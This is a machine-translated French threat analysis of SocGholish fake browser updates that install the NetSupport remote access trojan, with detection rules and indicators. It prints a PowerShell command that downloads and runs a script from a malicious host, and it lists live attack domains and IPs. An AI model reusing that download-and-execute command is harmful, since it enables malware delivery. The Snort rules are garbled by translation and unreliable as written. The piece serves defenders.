août 28, 2022

Cheval de Troie d’accès à distance NetSupport (RAT) livré via de fausses mises à jour de navigateur par les acteurs de la menace SocGholish

La campagne SocGholish est soupçonnée d’être liée à l’acteur menaçant russe connu sous le nom de « Evil Corp ». Les acteurs de la menace sont connus pour déposer du code HTML dans des sites Web obsolètes ou vulnérables. Lorsqu’un utilisateur visite le site Web compromis, le code génère une fenêtre contextuelle dans le navigateur qui tente de faire croire à l’utilisateur que son navigateur est obsolète. Si un utilisateur est incité à croire que son navigateur est obsolète, cliquer sur le lien « Mettre à jour » provoque le téléchargement d’un fichier d’archive contenant un JavaScript malveillant. Une fois le JavaScript exécuté, des logiciels malveillants supplémentaires sont téléchargés et installés sur l’ordinateur de l’utilisateur.

Chaîne d’infection

Site compromis [Redacted] – Conduit par
casting.faeryfox[.]com – Commandement et contrôle SocGholish (C2)
aeoi[.]pl/21.ico – Site de téléchargement NetSupport RAT
94.158.247[.]32/fakerl.htm – NetSupport RAT C2

L'image est une capture d'écran montrant le trafic PCAP observé pendant l'infection. — **Montré ci-dessus:** Trafic PCAP observé pendant l’infection.

Accès initial (drive-by)

L’accès initial a été obtenu lorsque l’utilisateur a navigué sur le site compromis hébergeant le code HTML injecté.

La capture d'écran montre un code HTML masqué injecté dans un site compromis qui redirige les visiteurs vers la page de mise à jour de Fake-Browser. — **Montré ci-dessus:** Code HTML masqué injecté dans un site compromis qui redirige les visiteurs vers la page de mise à jour du faux navigateur

La capture d'écran montre une fausse page de mise à jour du navigateur incitant l'utilisateur à télécharger un fichier d'archive contenant du JavaScript malveillant. — **Montré ci-dessus:** Fausse page de mise à jour du navigateur incitant l’utilisateur à télécharger un fichier d’archive contenant du JavaScript malveillant

Exécution

L’étape d’exécution a été obtenue lorsque l’utilisateur a été amené à télécharger et à exécuter le JavaScript dans le fichier d’archive téléchargé. Le JavaScript a été exécuté à l’aide du processus Windows Wscript. Le JavaScript contenait du code obscurci qui appelle le processus Windows PowerShell pour se connecter au site de téléchargement et exécuter un script PowerShell supplémentaire.

Processus parent : C:\Windows\System32\wscript.exe
Processus enfant : C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Ligne de commande: « C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe » -wh -c « iwr -usebasicparsing http://aeoi.pl/21.ico |iex »

Journaux du module PowerShell : CommandInvocation(Invoke-WebRequest): « Invoke-WebRequest » ParameterBinding(Invoke-WebRequest): name= »UseBasicParsing » ; value=”True” ParameterBinding(Invoke-WebRequest): name=”Uri”; value= »http://aeoi.pl/21.ico » CommandInvocation(Invoke-Expression): « Invoke-Expression »

La capture d'écran montre un agent utilisateur PowerShell d'un hôte infecté et un script PowerShell hébergé sur le site de téléchargement — **Montré ci-dessus:** Agent utilisateur PowerShell de l’hôte infecté et script PowerShell hébergé sur le site de téléchargement

La capture d'écran montre un script Partial PowerShell utilisé pour installer et renommer le client NetSupport RAT. — **Montré ci-dessus:** Script PowerShell partiel utilisé pour installer et renommer le client NetSupport RAT

Cette capture d'écran montre le fichier téléchargé et installé associé au NetSupport RAT. — **Montré ci-dessus:** Fichier téléchargé et installé associé au NetSupport RAT

La capture d'écran affiche le code qui s'affiche après l'installation, NetSupport tente d'identifier la géolocalisation de l'utilisateur — **Montré ci-dessus:** Après l’installation, NetSupport tente d’identifier la géolocalisation de l’utilisateur

La capture d'écran affiche les métadonnées du client NetSupport indiquant le nom d'origine après le changement de nom — **Montré ci-dessus:** Métadonnées du client NetSupport affichant le nom d’origine après le changement de nom

Persistance

La persistance a été obtenue par le script PowerShell hébergé sur le site de téléchargement. Le script a créé une clé de registre à exécuter au démarrage.

Les captures d'écran affichent la clé de registre créée pour démarrer le client NetSupport renommé whost.exe — **Montré ci-dessus:** Clé de registre créée pour démarrer le client NetSupport renommé whost.exe

Commander et contrôler

La capture d'écran affiche les communications réseau C2 de l'hôte infecté vers NetSupport RAT — **Montré ci-dessus:** Communications réseau C2 de l’hôte infecté vers NetSupport RAT

Contenu personnalisé OpenText pour identifier les comportements NetSupport RAT

Règles Sigma

La capture d'écran montre la règle Sigma utilisée pour détecter le comportement du processus associé au NetSupport RAT — **Montré ci-dessus:** Règle Sigma utilisée pour détecter le comportement du processus associé au NetSupport RAT

La capture d'écran montre la règle Sigma utilisée pour détecter le comportement du script de module PowerShell associé au RAT NetSupport. — **Montré ci-dessus:** Règle Sigma utilisée pour détecter le comportement du script de module PowerShell associé au NetSupport RAT

Règles de reniflement

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg : »OpenText – Windows Powershell User-Agent » ; flux :établi,vers_serveur ; contenu : »User-Agent|3a 20|Mozilla/ » ; contenu : ») WindowsPowerShell/ ”; http_header ; type de classe : non suspect ; sid:20228161; rev:1 😉

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg : »OpenText – NetSupport GeoLocation Lookup » ; flux :établi,vers_serveur ; contenu : »Hôte|3a 20|geo.netsupportsoftware.com|0d 0a| » ; http_header ; contenu :”GET”; http_method; content:”/location/loca.asp”; http_uri; sid:20228162; rev:1;)

alert tcp $HOME_NET any -> $EXTERNAL_NET 443 (msg : »OpenText – NetSupport RAT POST Request » ; flux : établi, vers_serveur ; contenu : « POST » ; contenu : « User-Agent|3A 20|NetSupport Manager/ » ; nocase ; sid:20228163; rév:1;)

Indicateurs de compromis

Hachage SHA-256 : 520b8a64a11fdfb63d584e11ec1355cba6943cf102501fe4670c6429cdc13a61 – Shrom.Update.zip
https://www.virustotal.com/gui/file/520b8a64a11fdfb63d584e11ec1355cba6943cf102501fe4670c6429cdc13a61/details

Hachage SHA-256 : 1455c4250fea9a6a589ea23a60e130ab3f414a510d63cbf4eaf5693012d6272d – AutoUpdater.js https://www.virustotal.com/gui/file/1455c4250fea9a6a589ea23a60e130ab3f414a510d63cbf4eaf5693012d6272d/details

Hachage SHA-256 : b6b51f4273420c24ea7dc13ef4cc7615262ccbdf6f5e5a49dae604ec153055ad – client32.exe
https://www.virustotal.com/gui/file/b6b51f4273420c24ea7dc13ef4cc7615262ccbdf6f5e5a49dae604ec153055ad/details

MITRE ATT&CK techniques observed

T1189 Compromis au volant
T1059.007 JavaScript
T1059.001 PowerShell
T1547.001 Clés d’exécution du registre / Dossier de démarrage
T1140 Désobscurcissement/décodage de fichiers ou d’informations
Logiciel d’accès à distance T1219

Maintenir la protection du système

La OpenText^MT Services de sécurité utilise sa vaste expérience pour identifier les risques de sécurité d’une organisation et travailler avec elle pour protéger les systèmes, offrant de multiples services pour répondre aux objectifs de cybersécurité et de confidentialité. Contactez-nous pour plus d’informations.

Auteur : Lenny Conway, consultant principal

Le meilleur outil 2023 pour ta croissance Instagram !

Source link
Partager :
Cliquez pour partager sur Twitter(ouvre dans une nouvelle fenêtre)
Cliquez pour partager sur Facebook(ouvre dans une nouvelle fenêtre)
Articles similaires

Blog ARC Optimizer